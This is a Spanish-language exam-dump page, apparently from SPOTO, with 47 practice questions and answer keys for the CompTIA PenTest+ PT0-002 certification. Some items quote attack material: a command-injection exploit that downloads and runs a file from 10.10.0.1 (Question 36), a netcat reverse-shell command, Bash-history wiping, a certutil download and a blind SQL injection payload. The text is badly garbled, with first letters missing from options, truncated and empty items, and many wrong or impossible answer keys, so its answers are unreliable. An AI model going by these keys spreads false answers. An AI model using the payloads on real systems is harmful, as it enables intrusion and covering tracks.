¿NO QUIERES PERDERTE NADA?

Consejos para aprobar el examen de certificación

Últimas noticias sobre exámenes e información sobre descuentos.

Curado y actualizado por nuestros expertos.

Sí, envíame el boletín.

Éxito del examen CompTIA PT0-002: Pruebas Simuladas y Recursos de Estudio, Certificación CompTIA PenTest+ | SPOTO

Prepárese para el éxito en su examen de certificación CompTIA PenTest+ (PT0-002) con nuestros Mock Tests & Recursos de Estudio. La mejor manera de prepararse para el examen es practicando las últimas preguntas de examen. Nuestros materiales de estudio incluyen pruebas de práctica, preguntas de muestra, vertederos de exámenes y preguntas y respuestas de exámenes, diseñados para ayudarlo a alcanzar el éxito. La certificación CompTIA PenTest+ es ideal para profesionales de ciberseguridad encargados de pruebas de penetración y gestión de vulnerabilidad. Con acceso a nuestros exámenes de prueba y simulador de examen, puede simular condiciones de examen reales y aumentar su confianza. Utilice nuestros materiales y respuestas de examen para reforzar su comprensión y preparación para el examen PT0-002. Prepárese con confianza y logre el éxito en el examen con nuestros completos recursos de estudio y exámenes de prueba.

Realizar otros exámenes en línea

Cuestionar #1
Un profesional de la seguridad quiere probar un dispositivo IoT enviando un paquete no válido a un servicio propietario que escucha en el puerto TCP 3011. Cuál de las siguientes opciones permitiría al profesional de la seguridad manipular fácilmente y mediante programación la longitud de la cabecera TCP y la suma de comprobación utilizando números arbitrarios y observar cómo responde el servicio propietario?
A. Nmap
B. tcpdump
C. capy
D. ping3
Ver respuesta
Respuesta correcta: C
Cuestionar #2
Un probador de penetración ha obtenido un shell de bajo privilegio en un servidor Windows con una configuración por defecto y ahora quiere explorar la posibilidad de explotar permisos de servicio mal configurados. ¿Cuál de los siguientes comandos ayudaría al probador a COMENZAR este proceso?
A. certutil -urlcache -split -f http://192
B. powershell (New-Object System
C. chtasks /query /fo LIST /v | find /I "Next Run Time:"
D. get http://192
Ver respuesta
Respuesta correcta: A
Cuestionar #3
Un probador de penetración obtiene acceso a un sistema y establece la persistencia, y luego ejecuta los siguientes comandos: cat /dev/null > temp touch -r .bash_history temp mv temp .bash_history ¿Cuál de las siguientes acciones es MÁS probable que realice el probador?
A. Redirigir el historial de Bash a /dev/null
B. Hacer una copia del historial de Bash del usuario para su posterior enumeración
C. ubrir huellas borrando el historial de Bash
D. Crear archivos señuelo en el sistema para confundir a los que responden al incidente
Ver respuesta
Respuesta correcta: A
Cuestionar #4
Un ingeniero de seguridad identificó un nuevo servidor en la red y quiere escanear el host para determinar si está ejecutando una versión aprobada de Linux y una versión parcheada de Apache. ¿Cuál de los siguientes comandos realizará esta tarea?
A. nmap -f -sV -p80 192
B. nmap -sS -sL -p80 192
C. map -A -T4 -p80 192
D. map -O -v -p80 192
Ver respuesta
Respuesta correcta: A
Cuestionar #5
Dado el siguiente código: ¿Cuál de los siguientes es el MEJOR método para prevenir este tipo de ataque? (Elija dos.)
A. Cortafuegos de aplicaciones web
B. Consultas parametrizadas
C. odificación de salida
D. Fichas de sesión
E. Validación de entradas
F. Codificación Base64
Ver respuesta
Respuesta correcta: BE
Cuestionar #6
Recientemente, un especialista en pruebas de penetración completó una revisión de la seguridad de un dispositivo de red central dentro de un entorno corporativo. Los hallazgos clave son los siguientes: (Se interceptó la siguiente solicitud dirigida al dispositivo de red: GET /login HTTP/1.1 Host: 10.50.100.16 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Authorization: Basic WU9VUilOQU1FOnNlY3JldHBhc3N3b3jk (cid:127) Las interfaces de gestión de red están disponibles en el sitio web de la empresa
A. Aplique requisitos de mayor complejidad a las contraseñas
B. Desactivar o actualizar el demonio SSH
C. esactivar la configuración de redireccionamiento HTTP/301
D. rear una red fuera de banda para la gestión
E. Implementar un método mejor para la autenticación
F. Eliminar las interfaces de gestión y control de la red
Ver respuesta
Respuesta correcta: CD
Cuestionar #7
Una empresa ha contratado a un especialista en pruebas de intrusión para que realice una prueba de ingeniería social contra sus empleados. Aunque el probador no encontró ningún número de teléfono de los empleados en el sitio web de la empresa, el probador se ha enterado de que el catálogo completo de teléfonos se publicó allí hace unos meses.¿En cuál de los siguientes lugares debería buscar PRIMERO el probador de penetración los números de los empleados?
A. Archivo web
B. GitHub
C. Metadatos de archivos
D. Foros clandestinos
Ver respuesta
Respuesta correcta: A
Cuestionar #8
Un ejecutivo necesita utilizar Wi-Fi para conectarse al servidor de la empresa mientras está de viaje. Buscando conexiones Wi-Fi disponibles, el ejecutivo se fija en un punto de acceso de una cadena hotelera que no está disponible donde se aloja el ejecutivo. ¿Cuál de los siguientes ataques es MÁS probable que sufra el ejecutivo?
A. Modificación de datos
B. Amplificación
C. Portal cautivo
D. Gemelo malvado
Ver respuesta
Respuesta correcta: D
Cuestionar #9
En un repositorio de archivos de red desprotegido, un probador de penetración descubre un archivo de texto que contiene nombres de usuario y contraseñas en texto claro y una hoja de cálculo que contiene datos de 50 empleados, incluidos nombres completos, funciones y números de serie. El probador se da cuenta de que algunas de las contraseñas del archivo de texto siguen el formato . ¿Cuál de las siguientes sería la mejor acción que podría emprender el probador con esta información?
A. Cree un diccionario de contraseñas personalizado como preparación para la prueba de rociado de contraseñas
B. Recomendar el uso de un gestor/bóveda de contraseñas en lugar de archivos de texto para almacenar las contraseñas de forma segurA
C. Recomendar la configuración de reglas de complejidad de contraseñas en todos los sistemas y aplicaciones
D. Documentar el repositorio de archivos desprotegido como un hallazgo en el reporte de prueba de penetracion
Ver respuesta
Respuesta correcta: D
Cuestionar #10
Se ha contratado a un probador de penetración para revisar la seguridad inalámbrica. El probador ha desplegado un AP inalámbrico malicioso que imita la configuración del WiFi de la empresa objetivo. El probador de penetración ahora quiere intentar forzar a las estaciones inalámbricas cercanas a conectarse al AP malicioso. ¿Cuál de los siguientes pasos debe tomar el probador PRÓXIMAMENTE?
A. Enviar tramas de desautenticación a las estaciones
B. Realice interferencias en todos los canales de 2,4 GHz y 5 GHz
C. onfigurar el AP malicioso para que emita dentro de los canales dinámicos de selección de frecuenciA
D. odificar la configuración del AP malicioso para que no utilice una clave pre-compartidA
Ver respuesta
Respuesta correcta: B
Cuestionar #11
Un probador de penetración estaba realizando una prueba de penetración y descubrió que el tráfico de red ya no llegaba a la dirección IP del cliente. El probador descubrió más tarde que el SOC había utilizado sinkholing en la dirección IP del probador de penetración. ¿Cuál de las siguientes opciones describe MEJOR lo sucedido?
A. El probador de penetración estaba probando los activos equivocados
B. El proceso de planificación no garantizó que se notificara a todos los equipos
C. El cliente no estaba preparado para iniciar la evaluación
D. El probador de penetración tenía información de contacto incorrecta
Ver respuesta
Respuesta correcta: C
Cuestionar #12
¿Cuál de las siguientes es la vulnerabilidad más común asociada a los dispositivos IoT conectados directamente a Internet? Los dispositivos IoT se entregan a menudo con contraseñas por defecto, que son fácilmente detectables y ampliamente conocidas. Muchos usuarios no cambian estas credenciales por defecto, dejando los dispositivos vulnerables a accesos no autorizados. Este problema es una de las vulnerabilidades más comunes asociadas a los dispositivos IoT conectados directamente a Internet. Los atacantes pueden explotar estas contraseñas predeterminadas para obtener co
A. istemas operativos no compatibles
B. usceptibilidad a los ataques DDoS
C. ncapacidad para trabajar en red
D. a existencia de contraseñas por defecto
Ver respuesta
Respuesta correcta: D
Cuestionar #13
Un probador de penetración explotó una vulnerabilidad en un servidor y ejecutó remotamente un payload para obtener un shell. Sin embargo, no se estableció una conexión y no se mostraron errores en la ejecución de la carga útil. El investigador sospechaba que un dispositivo de red, como un IPS o un cortafuegos de nueva generación, estaba interrumpiendo la conexión. ¿Cuál de los siguientes payloads es MÁS probable que establezca un shell con éxito?
A. windows/x64/meterpreter/reverse_tcp
B. windows/x64/meterpreter/reverse_http
C. windows/x64/shell_reverse_tcp
D. windows/x64/powershell_reverse_tcp
E. windows/x64/meterpreter/reverse_https
Ver respuesta
Respuesta correcta: D
Cuestionar #14
Cuál de las siguientes expresiones en Python incrementa una variable val en uno (Elija dos.)
A. al++
B. +val
C. al=(val+1)
D. +val
E. al=val++
F. val+=1
Ver respuesta
Respuesta correcta: C
Cuestionar #15
¿Cuáles de los siguientes riesgos de seguridad de las aplicaciones web forman parte del OWASP Top 10 v2017? (Elija dos.)
A. Desbordamientos del búfer
B. Secuencias de comandos en sitios cruzados
C. taques de condición racial
D. Ataques de día cero
E. Defectos de inyección
F. Ataques de ransomware
Ver respuesta
Respuesta correcta: C
Cuestionar #16
Un probador de penetración ha obtenido acceso root a un servidor de archivos basado en Linux y le gustaría mantener la persistencia después de reiniciar. Cuál de las siguientes técnicas sería la MEJOR para lograr este objetivo?
A. Crea un servicio systemd para establecer un shell inverso
B. Obtener /etc/shadow y forzar la contraseña de root
C. jecuta el comando nc -e /bin/sh<
D. esplazarse lateralmente para crear una cuenta de usuario en LDAP
Ver respuesta
Respuesta correcta: B
Cuestionar #17
¿Cuál de las siguientes opciones explica mejor por qué la comunicación es una fase vital de una prueba de penetración? La comunicación es una fase vital de una prueba de penetración para asegurar que todas las partes implicadas son conscientes del progreso de la prueba, los hallazgos y cualquier impacto potencial en las operaciones de negocio. Hablar sobre el conocimiento de la situación implica compartir información en tiempo real sobre el estado de la seguridad, las vulnerabilidades encontradas y los riesgos potenciales. Esto permite a la organización tomar decisiones con conocimiento de causa, mitigar los riesgos con prontitud y garantizar la seguridad
A. Debatir sobre el conocimiento de la situación
B. Establecer una buena relación con el contacto de emergenciA
C. Explicar el proceso de destrucción de datos
D. Garantizar la probabilidad de futuras evaluaciones
Ver respuesta
Respuesta correcta: A
Cuestionar #18
Un probador de penetración está probando una aplicación web que está alojada en un proveedor de nube pública. El probador es capaz de consultar los metadatos del proveedor y obtener las credenciales utilizadas por la instancia para autenticarse. ¿Cuál de las siguientes vulnerabilidades ha explotado el probador?
A. Falsificación de petición en sitios cruzados
B. Falsificación de peticiones del lado del servidor
C. Inclusión remota de archivos
D. Inclusión del código local
Ver respuesta
Respuesta correcta: B
Cuestionar #19
Un probador de penetración realizó un escaneo de descubrimiento que generó lo siguiente: ¿Cuál de los siguientes comandos generó los resultados anteriores y los transformará en una lista de hosts activos para su posterior análisis?
A. nmap -oG list
B. nmap -sn 192
C. map --open 192
D. map -o 192
Ver respuesta
Respuesta correcta: AC
Cuestionar #20
¿Cuál de las siguientes opciones describe MEJOR el Top 10 de OWASP? (Elija dos.)
A. Los riesgos más críticos de las aplicaciones web
B. Una lista de todos los riesgos de las aplicaciones web
C. os riesgos definidos por orden de importancia
D. Una norma de seguridad para aplicaciones web
E. Un marco de gestión de riesgos y cumplimiento
F. Lista de vulnerabilidades de Apache
Ver respuesta
Respuesta correcta: D
Cuestionar #21
Un cliente desea que una empresa de evaluación de la seguridad realice una prueba de penetración contra su hot site. El objetivo de la prueba es determinar la eficacia de las defensas que protegen contra las interrupciones de la continuidad del negocio. ¿Cuál de las siguientes es la medida MÁS importante que hay que tomar antes de iniciar este tipo de evaluación?
A. Asegúrese de que el cliente ha firmado el SOW
B. Verificar que el cliente ha concedido acceso de red al sitio caliente
C. eterminar si el entorno de conmutación por error depende de recursos que no son propiedad del cliente
D. stablecer procedimientos de comunicación y escalada con el cliente
Ver respuesta
Respuesta correcta: A
Cuestionar #22
Un evaluador de penetración está revisando el siguiente SOW antes de comprometerse con un cliente: "Los diagramas de red, el inventario de activos lógicos y físicos y los nombres de los empleados se tratarán como confidenciales del cliente. Una vez finalizado el contrato, el evaluador de intrusiones enviará los resultados al Director de Seguridad de la Información (CISO) del cliente a través de protocolos cifrados y, posteriormente, eliminará todos los resultados borrándolos de forma segura" Basándose en la información del SOW, ¿cuál de los siguientes comportamientos
A. Utilizar herramientas propias de pruebas de penetración que no estén a disposición del público o del cliente para su auditoría e inspección
B. Utilizar criptografía de clave pública para garantizar que los resultados se entregan al CISO una vez finalizado el compromiso
C. No compartir con el cliente las vulnerabilidades críticas que existen en la arquitectura del cliente para apaciguar al equipo directivo del cliente
D. uscar ayuda con el compromiso en foros clandestinos de hackers compartiendo la dirección IP pública del cliente
E. Utilizar una herramienta de borrado basada en software para borrar los hallazgos del cliente del ordenador portátil del probador de penetración
F. Conservar el SOW dentro de la empresa del probador de penetración para su uso futuro, de modo que el equipo de ventas pueda planificar futuras contrataciones
Ver respuesta
Respuesta correcta: CD
Cuestionar #23
La realización de una prueba de penetración contra un entorno con dispositivos SCADA conlleva un riesgo de seguridad adicional porque el:
A. los dispositivos producen más calor y consumen más energíA
B. los dispositivos están obsoletos y ya no se pueden sustituir
C. os protocolos son más difíciles de entender
D. os dispositivos pueden causar efectos en el mundo físico
Ver respuesta
Respuesta correcta: D
Cuestionar #24
Un probador de penetración obtuvo los siguientes resultados después de escanear un servidor web utilizando la utilidad dirb: ... PALABRAS GENERADAS: 4612 ---- URL de escaneo: http://10.2.10.13/ ---- + http://10.2.10.13/about (CODE:200|SIZE:1520) + http://10.2.10.13/home.html (CODE:200|SIZE:214) + http://10.2.10.13/index.html (CODE:200|SIZE:214) + http://10.2.10.13/info (CODE:200|SIZE:214) ... DESCARGADO: 4612 - ENCONTRADO: 4 ¿Cuál de los siguientes elementos es MÁS probable que contenga información útil para el probador de penetración?
A. index
B. sobre C
Ver respuesta
Respuesta correcta: AC
Cuestionar #25
Recientemente, un especialista en pruebas de penetración completó una revisión de la seguridad de un dispositivo de red central dentro de un entorno corporativo. Las principales conclusiones son las siguientes: Se interceptó la siguiente solicitud dirigida al dispositivo de red:GET /login HTTP/1.1 Host: 10.50.100.16 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0)Gecko/20100101 Firefox/31.0 Accept-Language: en-US,en;q=0.5 Connection: keep-alive Authorization: Basic WU9VUilOQU1FOnNlY3JldHBhc3N3b3jk Las interfaces de gestión de red están disponibles en el sistema de producción n
A. Aplique requisitos de mayor complejidad a las contraseñas
B. Desactivar o actualizar el demonio SSH
C. Desactivar la configuración de redireccionamiento HTTP/301
D. Crear una red fuera de banda para la gestión
E. Implementar un método mejor para la autenticación
F. Eliminar las interfaces de gestión y control de la red
Ver respuesta
Respuesta correcta: AE
Cuestionar #26
Un probador de penetración escribió el siguiente script para ser utilizado en un compromiso: ¿Cuál de las siguientes acciones realizará este script?
A. usque puertos abiertos
B. Escucha una concha inversA
C. ntento de inundar puertos abiertos
D. Crear un túnel cifrado
Ver respuesta
Respuesta correcta: A
Cuestionar #27
Un probador de penetración está probando la validación de entrada en un formulario de búsqueda que fue descubierto en un sitio web. ¿Cuál de los siguientes caracteres es la MEJOR opción para comprobar las vulnerabilidades del sitio web?
A. oma
B. Doble guión
C. ita simple
D. unto y coma
Ver respuesta
Respuesta correcta: C
Cuestionar #28
Un investigador ha conseguido explotar una vulnerabilidad utilizando el siguiente payload: IF (1=1) WAIT FOR DELAY '0:0:15' ¿Cuál de las siguientes acciones mitigaría mejor este tipo de ataque? El payload utilizado por el probador de penetración es un tipo de ataque de inyección SQL ciego que retrasa la respuesta de la base de datos 15 segundos si la condición es verdadera. Esto se puede utilizar para extraer información de la base de datos haciendo una serie de preguntas verdaderas o falsas. Para evitar este tipo de ataque, la mejor práctica es
A. Cifrado de contraseñas
B. arametrización de consultas
C. alida de codificación
D. aneamiento de HTML
Ver respuesta
Respuesta correcta: B
Cuestionar #29
Un probador de penetración quiere realizar un reconocimiento sin ser detectado. ¿Cuál de las siguientes actividades tiene una probabilidad MÍNIMA de detección? (Elija dos.)
A. Investigación de código abierto
B. Un barrido ping C
C.
D.
Ver respuesta
Respuesta correcta: B
Cuestionar #30
Una nueva empresa de seguridad está incorporando a su primer cliente. El cliente sólo permitía realizar pruebas durante el fin de semana y necesitaba los resultados el lunes por la mañana. Sin embargo, el equipo de evaluación no pudo acceder al entorno hasta el lunes. ¿Cuál de los siguientes elementos debería haber adquirido la empresa de seguridad ANTES de iniciar la evaluación?
A. Una declaración de trabajo firmada
B. Las cuentas de usuario correctas y las contraseñas asociadas C
Ver respuesta
Respuesta correcta: B
Cuestionar #31
Dada la siguiente salida: User-agent:* Disallow: /author/ Disallow: /xmlrpc.php Disallow: /wp-admin Disallow: /page/ ¿Durante cuál de las siguientes actividades es MÁS probable que se obtuviera este resultado?
A. Rastreo de sitios web
B. Clonación de sitios web
C. numeración de dominios
D. numeración URL
Ver respuesta
Respuesta correcta: CF
Cuestionar #32
Penetración En una evaluación para una organización cliente, un evaluador de penetración se da cuenta de que se han instalado numerosas versiones obsoletas de paquetes de software ...s- servidores críticos. ¿Cuál de las siguientes opciones mitigaría mejor este problema? La mejor manera de mitigar este problema es implementar programas de parcheo y control de cambios, que son procesos que implican aplicar actualizaciones o correcciones a paquetes de software para abordar vulnerabilidades, errores o problemas de rendimiento, y gestionar o documentar los cambios realizados en el software pa
A. mplantación de programas de parcheo y control de cambios
B. evisión de los scripts cliente utilizados para realizar las actualizaciones del sistemA
C. ormación correctiva para los administradores de sistemas del cliente
D. bstención de parchear los sistemas hasta que lo apruebe el control de calidad
Ver respuesta
Respuesta correcta: A
Cuestionar #33
Un probador de penetración se está preparando para realizar actividades para un cliente que requieren una interrupción mínima de las operaciones de la empresa. ¿Cuáles de las siguientes se consideran herramientas de reconocimiento pasivo? (Elija dos.) A.Wireshark
A.
B.
C.
D.
E.
Ver respuesta
Respuesta correcta: AC
Cuestionar #34
Se llama a añadir valores de cadena a otra cadena:
A. recopilación
B. conexión
C. oncatenación
D. Conjunción
Ver respuesta
Respuesta correcta: A
Cuestionar #35
Una empresa llevó a cabo un ataque de phishing simulado enviando a sus empleados correos electrónicos que incluían un enlace a un sitio que imitaba el portal SSO corporativo. El ochenta por ciento de los empleados que recibieron el correo electrónico hicieron clic en el enlace y proporcionaron sus credenciales corporativas en el sitio falso. ¿Cuál de las siguientes recomendaciones sería la MEJOR para resolver esta situación?
A. Implantar un programa educativo recurrente de concienciación sobre ciberseguridad para todos los usuarios
B. Implantar la autenticación multifactor en todas las aplicaciones corporativas
C. estringir a los empleados la navegación web definiendo una lista de sitios no aprobados en el proxy corporativo
D. mplementar una puerta de enlace de seguridad de correo electrónico para bloquear el spam y el malware de las comunicaciones por correo electrónico
Ver respuesta
Respuesta correcta: A
Cuestionar #36
Un probador de penetración fue capaz de obtener acceso a un sistema utilizando un exploit. A continuación se muestra un fragmento del código utilizado: exploit = "POST " exploit += "/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} - c${IFS}'cd${IFS}/ tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;${I FS}./apache'%0A%27&loginUser=a&Pwd=a" exploit += "HTTP/1.1" ¿Cuál de los siguientes comandos debería ejecutar el probador de penetración tras la intervención?
A. grep -v apache ~/
B. rm -rf /tmp/apache C
Ver respuesta
Respuesta correcta: D
Cuestionar #37
Un equipo de pruebas de penetración está realizando una prueba de penetración física para entrar en un edificio. ¿Cuál de las siguientes es la razón por la que los probadores de penetración deben llevar consigo copias de los documentos de compromiso?
A. Como copia de seguridad en caso de pérdida de los documentos originales
B. Guiarles por las entradas del edificio
C. Validar la información de facturación con el cliente
D. omo prueba en caso de ser descubiertos
Ver respuesta
Respuesta correcta: A
Cuestionar #38
Una empresa contrató a un equipo de pruebas de penetración para revisar los sistemas ciberfísicos de una planta de fabricación. El equipo descubrió inmediatamente que los sistemas de supervisión y los PLC están conectados a la intranet de la empresa. ¿Cuál de las siguientes suposiciones, si las hace el equipo de pruebas de penetración, es MÁS probable que sea válida?
A. Los PLCs no actuarán sobre comandos inyectados a través de la red
B. upervisores y controladores están en una red virtual separada por defecto
C. os controladores no validarán el origen de los comandos
D. os sistemas de supervisión detectarán una inyección maliciosa de código/comandos
Ver respuesta
Respuesta correcta: C
Cuestionar #39
Un probador de penetración que está realizando una evaluación de seguridad descubre que una vulnerabilidad crítica está siendo explotada activamente por ciberdelincuentes. ¿Cuál de las siguientes acciones debería realizar el evaluador a continuación?
A. Póngase en contacto con la persona de contacto principal
B. Tratar de derribar a los atacantes
C. lamar inmediatamente a las fuerzas del orden
D. ecopilar las pruebas adecuadas y añadirlas al informe final
Ver respuesta
Respuesta correcta: CE
Cuestionar #40
Un evaluador de intrusiones está enumerando recursos compartidos y recibe el siguiente resultado: ¿Cuál de las siguientes opciones debería enumerar a continuación? La salida mostrada es típica de lo que uno puede ver cuando usa una herramienta como smbclient o enum4linux para listar directorios compartidos en un sistema que usa el protocolo SMB (Server Message Block). He aquí un breve resumen de los recursos compartidos que se han encontrado: 1. print$ - Este recurso compartido se utiliza generalmente para los controladores de impresora. 2. 2. home - Podría ser el director de la casa de un usuario
A. ev
B. rint$
C. ome
D. otas
Ver respuesta
Respuesta correcta: A
Cuestionar #41
Un probador de penetración ejecutó un comando ping -A durante una prueba de entorno desconocido, y devolvió un paquete TTL 128. Cuál de los siguientes sistemas operativos devolvería MÁS probablemente un paquete de este tipo?
A. Windows
B. Manzana
C. inux
D. ndroid
Ver respuesta
Respuesta correcta: A
Cuestionar #42
¿Cuál de los siguientes documentos describe actividades específicas, entregables y calendarios para un evaluador de la penetración?
A. NDA
B. SA
C. OW
D. OU
Ver respuesta
Respuesta correcta: C
Cuestionar #43
Un probador de penetración que está haciendo una evaluación solicitada por la compañía le gustaría enviar tráfico a otro sistema utilizando doble etiquetado. Cuál de las siguientes técnicas sería la MEJOR para lograr este objetivo?
A. Clonación RFID
B. Etiquetado RFID
C. Metaetiquetado
D. Anidamiento de etiquetas
Ver respuesta
Respuesta correcta: D
Cuestionar #44
¿Cuál de las siguientes opciones puede utilizarse para almacenar datos alfanuméricos que pueden introducirse en scripts o programas como entrada para herramientas de pruebas de penetración?
A. Diccionario
B. Directorio
C. Enlace simbólico
D. Catálogo
E. Bucle For
Ver respuesta
Respuesta correcta: A
Cuestionar #45
El siguiente fragmento de PowerShell se extrajo de un registro de una máquina atacante: Un probador de penetración desea identificar la presencia de una matriz. ¿Cuál de los siguientes números de línea definiría la matriz?
A. Línea 8
B. Línea 13
C. Línea 19
D. Línea 20
Ver respuesta
Respuesta correcta: A
Cuestionar #46
¿Cuál de las siguientes opciones describe la MAYOR preocupación sobre el uso de bibliotecas de código abierto de terceros en el código de la aplicación? (Elija dos.)
A. Las bibliotecas pueden ser vulnerables
B. Las licencias del software son ambiguas C
C.
D.
Ver respuesta
Respuesta correcta: B
Cuestionar #47
Un consultor está revisando la siguiente salida después de los informes de problemas de conectividad intermitentes: ? (192.168.1.1) en 0a:d1:fa:b1:01:67 en en0 ifscope [ethernet] ? (192.168.1.12) en 34:a4:be:09:44:f4 en en0 ifscope [ethernet] ? (192.168.1.17) en 92:60:29:12:ac:d2 en en0 ifscope [ethernet] ? (192.168.1.34) en 88:de:a9:12:ce:fb en en0 ifscope [ethernet] ? (192.168.1.136) en 0a:d1:fa:b1:01:67 en en0 ifscope [ethernet] ? (192.168.1.255) en ff:ff:ff:ff:ff:ff en en0 ifscope [ethernet] ? (224.0.0.251) en 01:02:5e:7
A. Un dispositivo de la red tiene una dirección IP en una subred incorrectA
B. Se ha iniciado una sesión multicast utilizando un grupo multicast erróneo
C. n ataque de inundación ARP está utilizando la dirección de difusión para realizar DDoS
D. Un dispositivo en la red ha envenenado la caché ARP
Ver respuesta
Respuesta correcta: AE

Ver respuestas después del envío

Envíe su correo electrónico y WhatsApp para obtener las respuestas a sus preguntas.

Nota: asegúrese de que su ID de correo electrónico y Whatsapp sean válidos para que pueda obtener los resultados correctos del examen.

Correo electrónico:
WhatsApp/número de teléfono: